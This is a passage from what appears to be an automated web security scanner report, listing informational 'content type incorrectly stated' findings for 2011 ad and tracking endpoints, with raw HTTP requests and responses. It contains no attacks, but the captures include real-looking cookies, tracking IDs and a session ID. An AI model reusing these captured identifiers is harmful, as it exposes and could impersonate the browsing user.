Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=233090271.104762655.1317599330.1317599330.1317599330.1; __utmb=233090271.1.10.1317599330; __utmc=233090271; __utmz=233090271.1317599330.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Tue, 28 Sep 2010 08:48:57 GMT
Content-Type: text/html
Expires: Sun, 02 Oct 2011 23:49:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:49:08 GMT
Content-Length: 3198
Connection: close
Vary: Accept-Encoding

<head>
<script type="text/javascript" src="/js/jquery.js"></script>
<script type="text/javascript">
function getContentCallback(ajxUrl, ajxType, ajxCache, ajxDataType, callBackSuccess,
...[SNIP]...

28. Content type incorrectly stated
There are 119 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly, analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data, it may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


28.1. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/1310831078

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-06b34e08/p/travelocity.com/1310831078

Issue detail

The response contains the following Content-type statement: The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-06b34e08/p/travelocity.com/1310831078?mr='13357'&mi='1.249362358.1317600494998'&mt=!n&cs=!t&e=!(viewPage,gr)&pt=hoteloptions&pc=!(HOTEL_flow)&cv=(cbHistoryPerm:t)&r='http://travel.travelocity.com/hotel/HotelAvailability.do%3Bjsessionid%3D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%3FService%3DTRAVELOCITY%26SEQ%3D1317600526540922011%26pathIndicator%3DHOTEL_FRONTDOOR%26leavingDate%3Dmm/dd/yyyy%26returningDate%3Dmm/dd/yyyy%26city%3Dbos%26cityCountryCode%3DUS%26dateFormat%3Dmm/dd/yyyy%26searchMode%3Dcity%26'&sw=1920&sh=1200&sc=16&j=!t&u='http://travel.travelocity.com/hotel/HotelDetail.do%3Bjsessionid%3D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%3Ftab%3Dguide%26tripType%3Dhotel%26propertyId%3D4810%26airport%3DBOS%26resetReview%3Dtrue%26hotelQKey%3D-2237575859332798600%26tsHotelQKey%3D-2237575859332798600%26reviewPage%3DreviewStart%26locLink%3DHOTEL.HOTELAVAILABILITYLISTLITE1%7CNAT1%26dr%3D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149'&ce=(PrfFlightSrch:t)&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 66
Expires: Mon, 26 Sep 2011 00:13:18 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 03 Oct 2011 00:13:18 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["modFlexTab", "Cheapest Dates"], ["c", 1310831078]]);

28.2. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/1982940443

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-06b34e08/p/travelocity.com/1982940443

Issue detail

The response contains the following Content-type statement: The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-06b34e08/p/travelocity.com/1982940443?mr='13357'&mi='1.249362358.1317600494998'&mt=!n&cs=!t&e=!(viewPage,gr)&pt=unknown&r='http://www.travelocity.com/'&sw=1920&sh=1200&sc=16&j=!t&u='http://www.travelocity.com/472a'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 26 Sep 2011 00:08:18 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 03 Oct 2011 00:08:18 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1982940443]]);

28.3. http://a1.interclick.com/getInPageJS.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.interclick.com
Path:   /getInPageJS.aspx

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJS.aspx?a=54&b=50793&cid=634044326623672665 HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Opt=out; T=1

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Mon, 03 Oct 2011 05:59:49 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 02 Oct 2011 23:59:49 GMT
Content-Length: 6352

function isSilverlightVersionInstalled(version)
{
if (version == undefined)
version = null;

var isVersionSupported = false;
var container = null;

try
{

...[SNIP]...

28.4. http://a1.interclick.com/getInPageJSProcess.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.interclick.com
Path:   /getInPageJSProcess.aspx

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJSProcess.aspx?a=54&b=50793&cid=634044326623672665&isif=f&rurld=www.premierleague.com&sl=true&dvp=http%3A//www.premierleague.com/page/Home&rurl=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHeadlines%2F0%2C%2C12306~2466648%2C00.html HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Opt=out; T=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 03 Oct 2011 00:00:01 GMT
Content-Length: 636

document.write(unescape("%3CSCRIPT%20language%3D%27JavaScript1.1%27%20SRC%3D%22http%3A//ad.doubleclick.net/adj/N4610.153021.INTERCLICKNETWORK/B5581164.6%3Bsz%3D160x600%3Bclick%3Dhttp%3A//a1.interclick
...[SNIP]...

28.5. http://a2.twimg.com/profile_images/1470671793/ProfilePhoto_normal.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a2.twimg.com
Path:   /profile_images/1470671793/ProfilePhoto_normal.png

Issue detail

The response contains the following Content-type statement: The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /profile_images/1470671793/ProfilePhoto_normal.png HTTP/1.1
Host: a2.twimg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: gIeo4kgEP+1D9vqcLTjQgovHZJerwRXBngjHaKS2Aevpcdg7FcxsH3i1uSvVfIfq
x-amz-request-id: CB4FBC38941AF74A
Last-Modified: Sun, 31 Jul 2011 11:06:27 GMT
ETag: "e9c31ecfe665754654c7a297073b9bab"
Accept-Ranges: bytes
Content-Length: 1883
Server: AmazonS3
Cache-Control: max-age=31435387
Expires: Sun, 30 Sep 2012 20:04:17 GMT
Date: Mon, 03 Oct 2011 00:01:10 GMT
Connection: close
Content-Type: image/png
X-CDN: AKAM

......JFIF.....H.H.....XExif..MM.*...................i.........&.............................@...................C.....................................    ...    ......    
...[SNIP]...

28.6. http://ad.reklamport.com/rpgetad.ashx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.reklamport.com
Path:   /rpgetad.ashx

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /rpgetad.ashx?tt=t_reklamporttakip_THY_LP&ciid=483764&rnd=0.5661881791893393 HTTP/1.1
Host: ad.reklamport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 177
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: policyref="http://ad.reklamport.com/w3c/p3p.xml", CP="NON DSP COR CURa TIA"
mc: 155
Date: Sun, 02 Oct 2011 23:58:47 GMT
Connection: close

document.write("<script language='JavaScript' type='text/javascript'>"+"rp_html(483764,411702,..<script> </scr..+..ipt>..);".replace(new RegExp('..','gm'), '"')+"</sc"+"ript>");

28.7. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /PortalServe/?pid=1399334Q81720110831160016&flash=10&time=0|18:49|-5&redir=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~538936~3448~59764~134043~106934~3~345~25~premierleague.com~2~8~1~0~2~1~-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^~19~2~5ZvoQhA3FQCr~PpAVCxNh2PJr~1~1~1~~http%3A%2F%2Fbh.contextweb.com%2Fbh%2Fset.aspx%3Faction%3Dadd%26advid%3D3448%26token%3DTTCL1%26rurl%3D$CTURL$&data=345&r=0.26698742574080825 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CFJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=59AE0400-B34A-1C1C-0309-3510048A0101; PRca=|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 23:49:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4218
Set-Cookie:PRvt=CGJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmC1SzbAB3BAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCDhFS!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=59AE0400-D582-DB2C-030A-1BD000770100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKlp*1278:2|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKlpAAUc:2|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FsBu:2|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GWZl:2|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FsBuGWZl:2|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

28.8. http://adserver.teracent.net/tase/ad

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tase/ad?AdBoxType=15&url=virgin.dr.dfa&inv=doubleclick&rnd=1317602293772&esc=0&CustomQuery=eaid%3D245735545%26epid%3D70101326%26esid%3D1128332%26ecid%3D43398155%26ebuy%3D5794457%26 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://s0.2mdn.net/3268620/PID_1701515_parent_virgin_728.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1317601703104_282600831_ap3104_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; p441r=b$u-21#5.8Pr|i-2870764#1.8Pr|; p270r=b$u-7#A.8Qp|i-1401516#1.8Qp|i-1643195#1.8Qp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1317602404442_239271924_as3101_imp|194#1317602404442_239271924_as3101_imp|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/
Set-Cookie: p194r=b$u-98#5.8Qp|i-tracking#..2.8Qp.2.8Qp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:40:03 GMT
Content-Length: 2204

resourceServer=http%3A%2F%2Fpcdn.tcgmsrv.net%2Ftase&eventId=1317602404442_239271924_as3101_imp&responseStatus=0&eventUrl=http%3A%2F%2Fadserver.teracent.net%2Ftase%2Fredir%2F1317602404442_239271924_as3
...[SNIP]...

28.9. http://amch.questionmarket.com/adscgen/st.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/st.php?survey_num=928398&site=69802575&code=44069375&randnum=823146 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_928398-C|@~M-0_873769-]|@~M-0; LP=1317596202

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:55 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b102.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 165
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d928398/20/44069375/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();


28.10. http://api.connect.facebook.com/restserver.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.connect.facebook.com
Path:   /restserver.php

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

POST /restserver.php?method=fql.query HTTP/1.1
Host: api.connect.facebook.com
Proxy-Connection: keep-alive
Content-Length: 292
Origin: http://connect.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://connect.facebook.net/rsrc.php/v1/yK/r/RIxWozDt5Qq.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

query=SELECT%20total_count%20FROM%20link_stat%20WHERE%20url%3D%22http%3A%2F%2Fhublotnation.com%2F2011%2F09%2F16%2Fhublot-watches-bloghands-on-with-the-classic-fusion-chronograph-yacht-club-de-monaco%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: application/json
Expires: Sun, 02 Oct 2011 17:04:42 -0700
Pragma:
X-FB-Rev: 451912
X-FB-Server: 10.32.1.103
X-Cnection: close
Date: Mon, 03 Oct 2011 00:03:42 GMT
Content-Length: 21

[{"total_count":389}]

28.11. http://api.facebook.com/method/fql.query

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.facebook.com
Path:   /method/fql.query

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript;charset=utf-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /method/fql.query?format=json&query=select%20total_count%20from%20link_stat%20where%20url='undefined'&callback=jsonp1317599923384 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 02 Oct 2011 17:01:43 -0700
Pragma:
X-FB-Rev: 451912
X-FB-Server: 10.64.37.42
X-Cnection: close
Date: Mon, 03 Oct 2011 00:00:43 GMT
Content-Length: 23

jsonp1317599923384([]);

28.12. http://ar.voicefive.com/b/rc.pli

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p119936314&1317599990670 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1317599974%2E004%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:01:22 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");

28.13. http://as00.estara.com/fs/ruleaction.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://as00.estara.com
Path:   /fs/ruleaction.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

